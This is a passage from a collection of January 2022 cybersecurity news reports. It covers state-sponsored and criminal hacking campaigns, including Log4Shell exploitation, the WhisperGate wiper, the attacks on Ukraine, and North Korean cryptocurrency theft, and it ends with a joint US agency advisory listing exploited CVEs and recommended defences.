Most recently, cybersecurity company Sophos highlighted a slew of attacks against vulnerable Horizon servers that have been ongoing since January and have been mounted by threat actors to illicitly mine cryptocurrency, install PowerShell-based reverse shells, or to deploy Atera agents to remotely deliver additional payloads.
"Attempts to compromise Horizon servers are among the more targeted exploits of Log4Shell vulnerabilities because of their nature," Sophos researchers said, adding "platforms such as Horizon are particularly attractive targets to all types of malicious actors because they are widespread and can (if still vulnerable) easily found and exploited with well-tested tools."
Hackers Exploited MSHTML Flaw to Spy on Government and Defense Targets
26.1.2022 BigBrothers Thehackernews
Cybersecurity researchers on Tuesday took the wraps off a multi-stage espionage campaign targeting high-ranking government officials overseeing national security policy and individuals in the defense industry in Western Asia.
The attack is unique as it leverages Microsoft OneDrive as a command-and-control (C2) server and is split into as many as six stages to stay as hidden as possible, Trellix a new company created following the merger of security firms McAfee Enterprise and FireEye said in a report shared with The Hacker News.
"This type of communication allows the malware to go unnoticed in the victims' systems since it will only connect to legitimate Microsoft domains and won't show any suspicious network traffic," Trellix explained.
First signs of activity associated with the covert operation are said to have commenced as early as June 18, 2021, with two victims reported on September 21 and 29, followed by 17 more in a short span of three days between October 6 and 8.
Trellix attributed the sophisticated attacks with moderate confidence to the Russia-based APT28 group, also tracked under the monikers Sofacy, Strontium, Fancy Bear, and Sednit, based on similarities in the source code as well as in the attack indicators and geopolitical objectives.
"We are supremely confident that we are dealing with a very skilled actor based on how infrastructure, malware coding and operation were set up," Trellix security researcher Marc Elias said.
The infection chain begins with the execution of a Microsoft Excel file containing an exploit for the MSHTML remote code execution vulnerability (CVE-2021-40444), which is used to run a malicious binary that acts as the downloader for a third-stage malware dubbed Graphite.
The DLL executable uses OneDrive as the C2 server via the Microsoft Graph API to retrieve additional stager malware that ultimately downloads and executes Empire, an open-source PowerShell-based post-exploitation framework widely abused by threat actors for follow-on activities.
If anything, the development marks the continued exploitation of the MSTHML rendering engine flaw, with Microsoft and SafeBreach Labs disclosing multiple campaigns that have weaponized the vulnerability to plant malware and distribute custom Cobalt Strike Beacon loaders.
U.S. Sanctions 4 Ukrainians for Working with Russia to Destabilize Ukraine
24.1.2022 BigBrothers Thehackernews
The U.S. Treasury Department on Thursday announced sanctions against four current and former Ukrainian government officials for engaging in "Russian government-directed influence activities" in the country, including gathering sensitive information about its critical infrastructure.
The agency said the four individuals were involved in different roles as part of a concerted influence campaign to destabilize the nation, while also accusing Russia's national security authority, the Federal Security Service (FSB), of recruiting Ukrainians in key positions to create instability.
Two of the officials, Taras Kozak and Oleh Voloshyn, are alleged to have worked to amplify false narratives and undermine confidence in the Ukrainian government, while Vladimir Sivkovich, former Deputy Secretary of the Ukrainian National Security and Defense Council, attempted to build support for Ukraine to officially cede Crimea to Russia.
"Russia has directed its intelligence services to recruit current and former Ukrainian government officials to prepare to take over the government of Ukraine and to control Ukraine's critical infrastructure with an occupying Russian force," the Treasury Department said.
Volodymyr Oliynyk, the fourth Ukrainian official to be sanctioned, acted in cohorts with the FSB in 2021 to collect information pertaining to critical infrastructure in the country, which was then used by Russian-backed state hackers to wage a cyber war against the country.
"As Russia has pursued broad cyber operations against critical infrastructure, it has focused on disrupting one critical infrastructure sector in particular: Ukraine's energy sector," the Treasury Department added.
The sanctions come amid mounting tensions that Russia is preparing for a possible invasion of Ukraine, and almost a week after no fewer than 70 Ukrainian government agencies and private sector organizations fell victim to a coordinated digital assault that saw the websites defaced and a destructive malware deployed.
DoNot Hacking Team Targeting Government and Military Entities in South Asia
21.1.2022 BigBrothers Thehackernews
A threat actor with potential links to an Indian cybersecurity company has been nothing if remarkably persistent in its attacks against military organizations based in South Asia, including Bangladesh, Nepal, and Sri Lanka, since at least September 2020 by deploying different variants of its bespoke malware framework.
Slovak cybersecurity firm ESET attributed the highly targeted attack to a hacking group known as Donot Team. "Donot Team has been consistently targeting the same entities with waves of spear-phishing emails with malicious attachments every two to four months," researchers Facundo Muñoz and Matνas Porolli said.
Operating since at least 2016, Donot Team (also known as APT-C-35 and SectorE02) has been linked to a string of intrusions primarily targeting embassies, governments, and military entities in Bangladesh, Sri Lanka, Pakistan, and Nepal with Windows and Android malware.
In October 2021, Amnesty International unearthed evidence tying the group's attack infrastructure to an Indian cybersecurity company called Innefu Labs, raising suspicions that the threat actor may be selling the spyware or offering a hackers-for-hire service to governments of the region.
While it's not uncommon for APT groups to re-attack a previously compromised network by deploying stealthier backdoors to cover up their tracks, Donot Team tries a different tack in that it deploys multiple variants of the malware already in its arsenal.
Delivered via weaponized Microsoft Office documents, the so-called yty malware framework is a chain of intermediary downloaders that culminates in the execution of a backdoor, which takes care of retrieving additional components capable of harvesting files, recording keystrokes and screenshots, and deploying reverse shells for remote access.
ESET dubbed the new variants of yty, DarkMusical and Gedit, with telemetry data pointing to attacks from a third variant called Jaca from March to July 2021. The first wave of attacks using DarkMusical is said to have occurred in June 2021, while Gedit-related campaigns were observed as early as September 2020, only to pick up the pace a year later.
What's more, a fourth set of attacks that happened between February and March 2021 targeting military organizations in Bangladesh and Sri Lanka leveraged a modified version of Gedit codenamed Henos.
"Donot Team makes up for its low sophistication with tenacity," the researchers concluded. "We expect that it will continue to push on regardless of its many setbacks. Only time will tell if the group evolves its current TTPs and malware."
Russian Hackers Heavily Using Malicious Traffic Direction System to Distribute Malware
21.1.2022 BigBrothers Thehackernews
Potential connections between a subscription-based crimeware-as-a-service (Caas) solution and a cracked copy of Cobalt Strike have been established in what the researchers suspect is being offered as a tool for its customers to stage post-exploitation activities.
Prometheus, as the service is called, first came to light in August 2021 when cybersecurity company Group-IB disclosed details of malicious software distribution campaigns undertaken by cybercriminal groups to distribute Campo Loader, Hancitor, IcedID, QBot, Buer Loader, and SocGholish in Belgium and the U.S.
Costing $250 a month, it's marketed on Russian underground forums as a traffic direction system (TDS) to enable phishing redirection on a mass scale to rogue landing pages that are designed to deploy malware payloads on the targeted systems.
"Prometheus can be considered a full-bodied service/platform that allows threat groups to purvey their malware or phishing operations with ease," BlackBerry Research and Intelligence Team said in a report shared with The Hacker News. "The main components of Prometheus include a web of malicious infrastructure, malicious email distribution, illicit file-hosting through legitimate services, traffic redirection and the ability to deliver malicious files."
Typically, the redirection is funneled from one of two main sources, namely with the help of malicious ads (aka malvertising) on legitimate websites, or via websites that have been tampered to insert malicious code.
In the case of Prometheus, the attack chain starts with a spam email containing a HTML file or a Google Docs page that, upon interaction, redirects the victim to a compromised website hosting a PHP backdoor that fingerprints the machine to determine whether "to serve the victim with malware or redirect them to another page that might contain a phishing scam."
Earliest activity connected to the operators of the service, who go by the name "Ma1n" on hacking forums, is said to have commenced in October 2018, with the author linked to other illicit tools offering high quality redirects and PowerMTA kits for mailing to corporate mailboxes, before putting up Prometheus TDS for sale on September 22, 2020.
That's not all. BlackBerry also found overlaps between Prometheus-related activity and an illegitimate version of the Cobalt Strike adversary simulation and threat emulation software, raising the possibility that the copy is being "proliferated by the Prometheus operators themselves."
"It's possible that someone connected with the Prometheus TDS is maintaining this cracked copy and providing it upon purchase," the researchers said. "It is also possible that this cracked installation may be provided as part of a standard playbook or a virtual machine (VM) installation."
This is substantiated by the fact that a number of threat actors, including DarkCrystal RAT, FickerStealer, FIN7, Qakbot, and IceID, as well as ransomware cartels such as REvil, Ryuk (Wizard Spider), BlackMatter, and Cerber, have used the cracked copy in question over the last two years.
On top of that, the same Cobalt Strike Beacon has also been observed in conjunction with activities associated with an initial access broker tracked as Zebra2104, whose services have been put to use by groups like StrongPity, MountLocker, and Phobos for their own campaigns.
"While TDS'es aren't a new concept, the level of complexity, support and low financial cost adds credence to the theory that this is a trend that is likely to rise in the threat landscape's near future," the researchers noted.
"The volume of groups that are using offerings such as the Prometheus TDS, speak to the success and efficacy of these illicit infrastructure for hire services, which are in essence full-fledged enterprises that support the malicious activities of groups regardless of their size, level of resourcing or motives."
Ukraine: Recent Cyber Attacks Part of Wider Plot to Sabotage Critical Infrastructure
21.1.2022 BigBrothers Thehackernews
The coordinated cyberattacks targeting Ukrainian government websites and the deployment of a data-wiper malware called WhisperGate on select government systems are part of a broader wave of malicious activities aimed at sabotaging critical infrastructure in the country.
The Secret Service of Ukraine on Monday confirmed that the two incidents are related, adding the breaches also exploited the recently disclosed Log4j vulnerabilities to gain access to some of the compromised systems.
"The attack used vulnerabilities in the site's content management systems (October CMS) and Log4j, as well as compromised accounts of employees of the development company," the SSU said, corroborating prior disclosure from the Ukraine CERT team.
The disclosure comes days after Microsoft warned of a malware operation aimed at government, non-profit, and information technology entities in Ukraine, attributing the attacks to a threat cluster codenamed "DEV-0586."
"The attackers corrupted MBR records (the service information on the media required to access the data) on individual servers and user computers. Moreover, this applies to both operating systems running Windows and Linux."
The Ukrainian Cyber Police, for its part, noted that it's investigating a combination of three intrusion vectors that were likely used to pull off the attacks supply chain attack targeting an IT firm which manages websites for the Ukrainian government, exploitation of the flaw in October CMS, and Log4j vulnerabilities.
What's more, the IT firm referenced by Microsoft, Kitsoft, confirmed on Facebook it had been hit with the WhisperGate malware. "The current situation is not just about hacking websites, it is an attack aimed at sowing panic and fear, destabilizing the country from within," the company said.
While neither the Cyber Police nor the SSU attributed the defacements and the destructive malware attacks to any threat group or state-sponsored actor, the Ukrainian Ministry of Digital Transformation pointed fingers at Russia, accusing the country of trying to "wage a hybrid war."
Earth Lusca Hackers Aimed at High-Value Targets in Government and Private Sectors
19.1.2022 BigBrothers Thehackernews
An elusive threat actor called Earth Lusca has been observed striking organizations across the world as part of what appears to be simultaneously an espionage campaign and an attempt to reap monetary profits.
"The list of its victims includes high-value targets such as government and educational institutions, religious movements, pro-democracy and human rights organizations in Hong Kong, COVID-19 research organizations, and the media, amongst others," Trend Micro researchers said in a new report. "However, the threat actor also seems to be financially motivated, as it also took aim at gambling and cryptocurrency companies.
The cybersecurity firm attributed the group as part of the larger China-based Winnti cluster, which refers to a number of linked groups rather than a single discrete entity that are focused on intelligence gathering and intellectual property theft.
Earth Lusca's intrusion routes are facilitated by spear-phishing and watering hole attacks, while also leveraging vulnerabilities in public-facing applications, such as Microsoft Exchange ProxyShell and Oracle GlassFish Server exploits, as an attack vector.
The infection chains lead to the deployment of Cobalt Strike, alongside a variety of additional malware such as Doraemon, ShadowPad, Winnti, FunnySwitch, and web shells like AntSword and Behinder.
Cobalt Strike is a full-featured intrusion suite that originated as a legitimate remote access tool, developed for red teams to use in penetration testing. However, in recent years, it has become one of the preferred tools in a threat actor's arsenal and the primary means of turning a foothold into a hands-on intrusion.
Interestingly, while the attacks also involve installing cryptocurrency miners on infected hosts, the researchers pointed out that "the revenue earned from the mining activities seem low."
Telemetry data gathered by Trend Micro reveal that Earth Lusca staged attacks against entities that could be of strategic interest to the Chinese government, including
Gambling companies in Mainland China
Government institutions in Taiwan, Thailand, Philippines, Vietnam, United Arab Emirates, Mongolia, and Nigeria
Educational institutions in Taiwan, Hong Kong, Japan, and France
News media in Taiwan, Hong Kong, Australia, Germany, and France
Pro-democracy and human rights political organizations and movements in Hong Kong
COVID-19 research organizations in the U.S.
Telecom companies in Nepal
Religious movements that are banned in Mainland China, and
Various cryptocurrency trading platforms
"Evidence points to Earth Lusca being a highly-skilled and dangerous threat actor mainly motivated by cyberespionage and financial gain. However, the group still primarily relies on tried-and-true techniques to entrap a target," the researchers said.
"While this has its advantages (the techniques have already proven to be effective), it also means that security best practices, such as avoiding clicking on suspicious email/website links and updating important public-facing applications, can minimize the impact or even stop an Earth Lusca attack."
Ukrainian Government Officially Accuses Russia of Recent Cyberattacks
19.1.2022 BigBrothers Thehackernews
The government of Ukraine on Sunday formally accused Russia of masterminding the attacks that targeted websites of public institutions and government agencies this past week.
"All the evidence points to the fact that Russia is behind the cyber attack," the Ministry of Digital Transformation said in a statement. "Moscow continues to wage a hybrid war and is actively building forces in the information and cyberspace."
The purpose of the attack, said the ministry, "is not only to intimidate society," but to also "destabilize the situation in Ukraine by stopping the work of the public sector and undermining the confidence in the government on the part of Ukrainians."
Russia, however, has denied it was behind the intrusion. "We have nothing to do with it, and Russia has nothing to do with these cyberattacks," Dmitry Peskov, press secretary for President Vladimir Putin, told CNN, adding "We are nearly accustomed to the fact that Ukrainians are blaming everything on Russia, even their bad weather."
The disclosure comes as scores of Ukrainian government websites were vandalized on Friday with an ominous message threatening its citizens to "be afraid and expect the worst" and alleging their personal information had been hacked.
According to the Security Service of Ukraine (SSU), the attack is believed to have been carried out after the malicious actors gained access to the infrastructure of a private company that had the rights to manage some of the affected websites.
Separately, Microsoft warned of destructive data-wiping malware disguised as ransomware being used in attacks against multiple organizations in Ukraine. The company, which is calling this new malware family WhisperGate, attributed it to a threat cluster it's tracking as DEV-0586.
A New Destructive Malware Targeting Ukrainian Government and Business Entities
19.1.2022 BigBrothers Thehackernews
Cybersecurity teams from Microsoft on Saturday disclosed they identified evidence of a new destructive malware operation dubbed "WhisperGate" targeting government, non-profit, and information technology entities in Ukraine amid brewing geopolitical tensions between the country and Russia.
"The malware is disguised as ransomware but, if activated by the attacker, would render the infected computer system inoperable," Tom Burt, corporate vice president of customer security and trust at Microsoft, said, adding the intrusions were aimed at government agencies that provide critical executive branch or emergency response functions.
Also among those affected by the malware is an IT firm that "manages websites for public and private sector clients, including government agencies whose websites were recently defaced," Burt noted.
The computing giant, which first detected the malware on January 13, attributed the attacks to an emerging threat cluster codenamed "DEV-0586," with no observed overlaps in tactics and procedures to other previously documented groups. It further said the malware was found on dozens of impacted systems, a number it expects to increase as the investigation continues.
According to Microsoft Threat Intelligence Center (MSTIC) and Microsoft Digital Security Unit (DSU), the attack chain is a two-stage process that entails
Overwriting the Master Boot Record (MBR), the first sector of any hard disk that identifies where the operating system is located in the disk so that it can be loaded into a computer's RAM, on a victim's system to display a fake ransom note urging the target to pay an amount of $10,000 to a bitcoin wallet
A second-stage executable that retrieves a file corrupter malware hosted on a Discord channel that's designed to search for files with 189 different extensions, then irrevocably overwrite their contents with a fixed number of 0xCC bytes and rename each file with a seemingly random four-byte extension.
The malicious activity is "inconsistent" with cybercriminal ransomware activity for reasons that "explicit payment amounts and cryptocurrency wallet addresses are rarely specified in modern criminal ransom notes" and "the ransom note in this case does not include a custom ID," Microsoft said.
The development comes as numerous government websites in the Eastern European country were defaced on Friday with a message warning Ukrainians that their personal data was being uploaded to the Internet. The Security Service of Ukraine (SSU) said it found "signs" of involvement of hacking groups associated with the Russian intelligence services.
"Given the scale of the observed intrusions, MSTIC is not able to assess intent of the identified destructive actions but does believe these actions represent an elevated risk to any government agency, non-profit or enterprise located or with systems in Ukraine," the researchers cautioned.
However, Reuters earlier today raised the possibility that the attacks may have been the work of an espionage group linked to Belarusian intelligence that's tracked as UNC1151 and Ghostwriter. "Multiple significant intrusions into Ukrainian government entities have been conducted by UNC1151," cybersecurity firm Mandiant disclosed in a report in November 2021, pointing out the group's operations as those aligned with Belarusian government interests.
Massive Cyber Attack Knocks Down Ukrainian Government Websites
19.1.2022 BigBrothers Thehackernews
No fewer than 70 websites operated by the Ukrainian government went offline on Friday for hours in what appears to be a coordinated cyber attack amid heightened tensions with Russia.
"As a result of a massive cyber attack, the websites of the Ministry of Foreign Affairs and a number of other government agencies are temporarily down," Oleg Nikolenko, MFA spokesperson, tweeted.
The Security Service of Ukraine, the country's law-enforcement authority, alluded to a possible Russian involvement, pointing fingers at the hacker groups associated with the Russian secret services while branding the intrusions as a supply chain attack that involved hacking the "infrastructure of a commercial company that had access to the rights to administer the web resources affected by the attack."
Prior to the update from the SSU, the Ukrainian CERT claimed that the attacks may have exploited a security vulnerability in Laravel-based October CMS (CVE-2021-32648), which could be abused by an adversary to gain access to an account using a specially crafted request.
The breach targeted a number of government websites, including those for Ukraine's Cabinet, education, agriculture, emergency, energy, veterans affairs, and environment ministries, among others, 10 websites of which were "subjected to unauthorized interference."
The security agency, however, stressed that content of the sites was not altered and that no sensitive personal data was stolen.
"Provocative messages were posted on the main page of the websites," the SSU said. "The content of the sites was not changed, and, according to preliminary information, no leakage of personal data occurred."
This is far from the first time Russia has set its sights on Ukraine. In December 2015, a nation-state adversary tracked as Sandworm targeted the power grid, resulting in unprecedented blackouts for roughly 230,000 consumers in the nation.
Two years later, Ukraine was also at the receiving end of the devastating NotPetya wiper malware campaign by the Sandworm military hackers that erased confidential data from the computers of banks and energy firms.
Then in November 2021, the SSU unmasked the real identities of five Russian intelligence officials allegedly involved in over 5,000 cyberattacks attributed to a cyber-espionage group named Gamaredon aimed at public authorities and critical infrastructure located in the country.
"The purpose of such attacks is to destabilize the internal situation in the country, as well as to sow chaos and disbelief in society," the Center for Strategic Communications and Information Security said, noting the hacks amount to "psychological pressure and intimidation."
North Korean Hackers Stole Millions from Cryptocurrency Startups Worldwide
19.1.2022 BigBrothers Thehackernews
Operators associated with the Lazarus sub-group BlueNoroff have been linked to a series of cyberattacks targeting small and medium-sized companies worldwide with an aim to drain their cryptocurrency funds, in what's yet another financially motivated operation mounted by the prolific North Korean state-sponsored actor.
Russian cybersecurity company Kaspersky, which is tracking the intrusions under the name "SnatchCrypto," noted that the campaign has been running since at 2017, adding the attacks are aimed at startups in the FinTech sector located in China, Hong Kong, India, Poland, Russia, Singapore, Slovenia, the Czech Republic, the U.A.E., the U.S., Ukraine, and Vietnam.
"The attackers have been subtly abusing the trust of the employees working at targeted companies by sending them a full-featured Windows backdoor with surveillance functions, disguised as a contract or another business file," the researchers said. "In order to eventually empty the victim's crypto wallet, the actor has developed extensive and dangerous resources: complex infrastructure, exploits and malware implants."
BlueNoroff, and the larger Lazarus umbrella, are known for deploying a diverse arsenal of malware for a multi-pronged assault on businesses to illicitly procure funds, including relying on a mix of advanced phishing tactics and sophisticated malware, for the sanctions-hit North Korean regime and generate revenue for its nuclear weapons and ballistic missile programs.
If anything, these cyber offensives are paying off big time. According to a new report published by blockchain analytics firm Chainalysis, the Lazarus Group has been linked to seven attacks on cryptocurrency platforms that extracted almost $400 million worth of digital assets in 2021 alone, up from $300 million in 2020.
"These attacks targeted primarily investment firms and centralized exchanges [
] to siphon funds out of these organizations' internet-connected 'hot' wallets into DPRK-controlled addresses," the researchers said. "Once North Korea gained custody of the funds, they began a careful laundering process to cover up and cash out" through mixers to obscure the trail.
Documented malicious activity involving the nation-state actor have take the form of cyber-enabled heists against foreign financial institutions, notably the SWIFT banking network hacks in 2015-2016, with recent campaigns resulting in the deployment of a backdoor called AppleJeus that poses as a cryptocurrency trading platform to plunder and transfer money to their accounts.
The SnatchCrypto attacks are no different in that they are part of the actor's efforts focused on "stalking and studying" cryptocurrency firms by concocting elaborate social engineering schemes to build trust with their targets by posing as legitimate venture capitalist firms, only to bait the victims into opening malware-laced documents that retrieve a payload designed to run a malicious executable received over an encrypted channel from a remote server.
An alternative method used to trigger the infection chain is the use of Windows shortcut files (".LNK") to fetch the next-stage malware, a Visual Basic Script, that then acts a jump off point to execute a series of intermediary payloads, before installing a full-featured backdoor that comes with "enriched" capabilities to capture screenshots, record keystrokes, steal data from Chrome browser, and execute arbitrary commands.
The ultimate goal of the attacks, however, is to monitor financial transactions of the compromised users and steal cryptocurrency. Should a potential target use a Chrome extension like Metamask to manage crypto wallets, the adversary stealthily moves to locally replace the main component of the extension with a fake version that alerts the operators every time a large transfer is kicked off to another account.
In the final phase, the funds are subsequently diverted by performing a malicious code injection to intercept and modify the transaction details on demand. "The attackers modify not only the recipient [wallet] address, but also push the amount of currency to the limit, essentially draining the account in one move," the researchers explained.
"Cryptocurrency is a heavily targeted sector when it comes to cybercrime due to the decentralized nature of the currencies and the fact that, unlike with credit card or bank transfers, the transaction happens quickly and is impossible to reverse," Erich Kron, security awareness advocate at KnowBe4, said in a statement.
"Nation-states, especially those under strict tariffs or other financial restrictions, can benefit greatly by stealing and manipulating cryptocurrency. Many times, a cryptocurrency wallet can contain multiple types of cryptocurrency, making them a very appealing target," Kron added.
Iranian Hackers Exploit Log4j Vulnerability to Deploy PowerShell Backdoor
19.1.2022 BigBrothers Thehackernews
An Iranian state-sponsored actor has been observed scanning and attempting to abuse the Log4Shell flaw in publicly-exposed Java applications to deploy a hitherto undocumented PowerShell-based modular backdoor dubbed "CharmPower" for follow-on post-exploitation.
"The actor's attack setup was obviously rushed, as they used the basic open-source tool for the exploitation and based their operations on previous infrastructure, which made the attack easier to detect and attribute," researchers from Check Point said in a report published this week.
The Israeli cybersecurity company linked the attack to a group known as APT35, which is also tracked using the codenames Charming Kitten, Phosphorus, and TA453, citing overlaps with toolsets previously identified as infrastructure used by the threat actor.
Log4Shell aka CVE-2021-44228 (CVSS score: 10.0) concerns a critical security vulnerability in the popular Log4j logging library that, if successfully exploited, could lead to remote execution of arbitrary code on compromised systems.
The ease of the exploitation coupled with the widespread use of Log4j library has created a vast pool of targets, even as the shortcoming has attracted swarms of bad actors, who have seized on the opportunity to stage a dizzying array of attacks since its public disclosure last month.
While Microsoft previously pointed out APT35's efforts to acquire and modify the Log4j exploit, the latest findings show that the hacking group has operationalized the flaw to distribute the PowerShell implant capable of retrieving next-stage modules and exfiltrating data to a command-and-control (C2) server.
CharmPower's modules also support a variety of intelligence gathering functionality, including features to gather system information, list installed applications, take screenshots, enumerate running processes, execute commands sent from the C2 server, and clean up any signs of evidence created by these components.
The disclosure comes as Microsoft and the NHS cautioned that internet-facing systems running VMware Horizon are being targeted to deploy web shells and a new strain of ransomware called NightSky, with the tech giant connecting the latter to a China-based operator dubbed DEV-0401, which has also deployed LockFile, AtomSilo, and Rook ransomware in the past.
What's more, Hafnium, another threat actor group operating out of China, has also been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting, Microsoft noted.
"Judging by their ability to take advantage of the Log4j vulnerability and by the code pieces of the CharmPower backdoor, the actors are able to change gears rapidly and actively develop different implementations for each stage of their attacks," the researchers said.
US Cyber Command Links 'MuddyWater' Hacking Group to Iranian Intelligence
19.1.2022 BigBrothers Thehackernews
The U.S. Cyber Command (USCYBERCOM) on Wednesday officially confirmed MuddyWater's ties to the Iranian intelligence apparatus, while simultaneously detailing the various tools and tactics adopted by the espionage actor to burrow into victim networks.
"MuddyWater has been seen using a variety of techniques to maintain access to victim networks," USCYBERCOM's Cyber National Mission Force (CNMF) said in a statement. "These include side-loading DLLs in order to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control functions."
The agency characterized the hacking efforts as a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS), corroborating earlier reports about the nation-state actor's provenance.
Also tracked under the monikers Static Kitten, Seedworm, Mercury and TEMP.Zagros, MuddyWater is known for its attacks primarily directed against a wide gamut of entities in governments, academia, cryptocurrency, telecommunications, and oil sectors in the Middle East. The group is believed to have been active at least since 2017.
Recent intrusions mounted by the adversary have involved exploiting the ZeroLogon (CVE-2020-1472) vulnerability as well as leveraging remote desktop management tools such as ScreenConnect and Remote Utilities to deploy custom backdoors that could enable the attackers to gain unauthorized access to sensitive data.
Last month, Symantec's Threat Hunter Team publicized findings about a new wave of hacking activities unleashed by the Muddywater group against a string of telecom operators and IT companies throughout the Middle East and Asia during the previous six months using a blend of legitimate tools, publicly available malware, and living-off-the-land (LotL) methods.
Also incorporated into its toolset is a backdoor named Mori and a piece of malware called PowGoop, a DLL loader designed to decrypt and run a PowerShell-based script that establishes network communications with a remote server.
Malware samples attributed to the advanced persistent threat (APT) have been made available on the VirusTotal malware aggregation repository, which can be accessed here.
"Analysis of MuddyWater activity suggests the group continues to evolve and adapt their techniques," SentinelOne researcher Amitai Ben Shushan Ehrlich said. "While still relying on publicly available offensive security tools, the group has been refining its custom toolset and utilizing new techniques to avoid detection."
FBI, NSA and CISA Warns of Russian Hackers Targeting Critical Infrastructure
19.1.2022 BigBrothers Thehackernews
Amid renewed tensions between the U.S. and Russia over Ukraine and Kazakhstan, American cybersecurity and intelligence agencies on Tuesday released a joint advisory on how to detect, respond to, and mitigate cyberattacks orchestrated by Russian state-sponsored actors.
To that end, the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA) have laid bare the tactics, techniques, and procedures (TTPs) adopted by the adversaries, including spear-phishing, brute-force, and exploiting known vulnerabilities to gain initial access to target networks.
The list of flaws exploited by Russian hacking groups to gain an initial foothold, which the agencies said are "common but effective," are below
CVE-2018-13379 (FortiGate VPNs)
CVE-2019-1653 (Cisco router)
CVE-2019-2725 (Oracle WebLogic Server)
CVE-2019-7609 (Kibana)
CVE-2019-9670 (Zimbra software)
CVE-2019-10149 (Exim Simple Mail Transfer Protocol)
CVE-2019-11510 (Pulse Secure)
CVE-2019-19781 (Citrix)
CVE-2020-0688 (Microsoft Exchange)
CVE-2020-4006 (VMWare)
CVE-2020-5902 (F5 Big-IP)
CVE-2020-14882 (Oracle WebLogic)
CVE-2021-26855 (Microsoft Exchange, exploited frequently alongside CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065)
"Russian state-sponsored APT actors have also demonstrated sophisticated tradecraft and cyber capabilities by compromising third-party infrastructure, compromising third-party software, or developing and deploying custom malware," the agencies said.
"The actors have also demonstrated the ability to maintain persistent, undetected, long-term access in compromised environments including cloud environments by using legitimate credentials."
Russian APT groups have been historically observed setting their sights on operational technology (OT) and industrial control systems (ICS) with the goal of deploying destructive malware, chief among them being the intrusion campaigns against Ukraine and the U.S. energy sector as well as attacks exploiting trojanized SolarWinds Orion updates to breach the networks of U.S. government agencies.
To increase cyber resilience against this threat, the agencies recommend mandating multi-factor authentication for all users, looking out for signs of abnormal activity implying lateral movement, enforcing network segmentation, and keeping operating systems, applications, and firmware up to date.
"Consider using a centralized patch management system," the advisory reads. "For OT networks, use a risk-based assessment strategy to determine the OT network assets and zones that should participate in the patch management program."
Other recommended best practices are as follows
Implement robust log collection and retention
Require accounts to have strong passwords
Enable strong spam filters to prevent phishing emails from reaching end-users
Implement rigorous configuration management programs
Disable all unnecessary ports and protocols
Ensure OT hardware is in read-only mode
North Korean Hackers Start New Year with Attacks on Russian Foreign Ministry
14.1.2022 BigBrothers Thehackernews
A North Korean cyberespionage group named Konni has been linked to a series of targeted attacks aimed at the Russian Federation's Ministry of Foreign Affairs (MID) with New Year lures to compromise Windows systems with malware.
"This activity cluster demonstrates the patient and persistent nature of advanced actors in waging multi-phased campaigns against perceived high-value networks," researchers from Lumen Technologies' Black Lotus Labs said in an analysis shared with The Hacker News.
The Konni group's tactics, techniques, and procedures (TTPs) are known to overlap with threat actors belonging to the broader Kimsuky umbrella, which is also tracked by the cybersecurity community under the monikers Velvet Chollima, ITG16, Black Banshee, and Thallium.
The most recent attacks involved the actor gaining access to the target networks through stolen credentials, exploiting the foothold to load malware for intelligence gathering purposes, with early signs of the activity documented by MalwareBytes as far back as July 2021.
Subsequent iterations of the phishing campaign are believed to have unfolded in three waves the first commencing on October 19, 2021 to harvest credentials from MID personnel, followed by leveraging COVID-19 themed lures in November to install a rogue version of the Russian-mandated vaccination registration software that served as a loader for additional payloads.
"The timing of this activity closely aligned with the passage of Russian Vaccine Passport laws that mandated Russians had to receive a QR code from the government to prove vaccination in order to access public places such as restaurants and bars," the researchers noted.
The third attack, also corroborated by Cluster25 earlier this week, began on December 20, 2021, using New Year's Eve festivities as a spear-phishing theme to trigger a multi-stage infection chain that culminated in the installation of a remote access trojan named Konni RAT.
Specifically, the intrusions transpired by first compromising the email account belonging to a staff member of the MID, from which emails were sent to at least two other MID entities, including the Russian Embassy in Indonesia and Sergey Alexeyevich Ryabkov, a deputy minister overseeing non-proliferation and arms control.
The email missives seemingly propagated a "Happy New Year's" message, only to contain a trojanized screensaver attachment that's designed to retrieve and run next-stage executables from a remote server. The final stage of the attack is the deployment of the Konni RAT trojan, which conducts reconnaissance of the infected machine and exfiltrates the collected information back to the server.
"While this particular campaign was highly targeted, it is vital for defenders to understand the evolving capabilities of advanced actors to achieve infection of coveted targets," the researcher said, urging organizations to watch out for phishing emails and use multi-factor authentication to secure accounts.